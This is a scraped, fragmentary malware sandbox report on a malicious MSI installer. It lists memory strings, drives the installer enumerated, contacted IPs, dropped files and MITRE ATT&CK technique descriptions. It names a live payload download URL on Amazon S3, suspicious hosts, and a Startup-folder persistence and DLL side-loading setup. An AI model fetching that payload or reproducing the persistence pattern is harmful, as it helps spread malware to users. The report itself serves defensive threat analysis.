Source: fQQPwD.exe, 00000010.00000002.508539342.00000000075E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.LZ5
Source: fQQPwD.exe, 00000010.00000002.508539342.00000000075E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.asxo
Source: fQQPwD.exe, 00000010.00000002.506633534.0000000007287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.asxo/
Source: fQQPwD.exe, 00000010.00000002.506633534.0000000007287000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amxx1515cabreun23.asxo4
Source: DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr	String found in binary or memory: https://collect.installeranalytics.com
Source: DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr	String found in binary or memory: https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic
Source: msiexec.exe	String found in binary or memory: https://mzrdmodlonnce.s3.amazonaws.com/digivolve.msi
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710

Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.203.138.85

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DRTO10179793.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\412f33.rbs

C:\Users\user\AppData\Local\AdvinstAnalytics\63b40ecc97912e61927c21ea\5.3.12.2\tracking.ini

C:\Users\user\AppData\Local\AdvinstAnalytics\63b40ecc97912e61927c21ea\5.3.12.2\{313622DF-58D1-4508-BE49-26CDA366CBBC}.session

C:\Users\user\AppData\Local\Temp\shi7C43.tmp

C:\Users\user\AppData\Local\Temp\shi7D6D.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fQQPwD.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\pantaleao.ini

C:\Users\user\digimn.bz2

C:\Users\user\fQQPwD.exe (copy)

C:\Users\user\fQQPwD.zip

C:\Users\user\garurumon.bz2

C:\Users\user\msedge_elf.dll (copy)

C:\Windows\Installer\412f31.msi

C:\Windows\Installer\412f34.msi

C:\Windows\Installer\MSI8958.tmp

C:\Windows\Installer\MSI8D6F.tmp

C:\Windows\Installer\MSI8E3C.tmp

C:\Windows\Installer\MSI90BD.tmp

Windows Analysis Report
DRTO10179793.msi

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre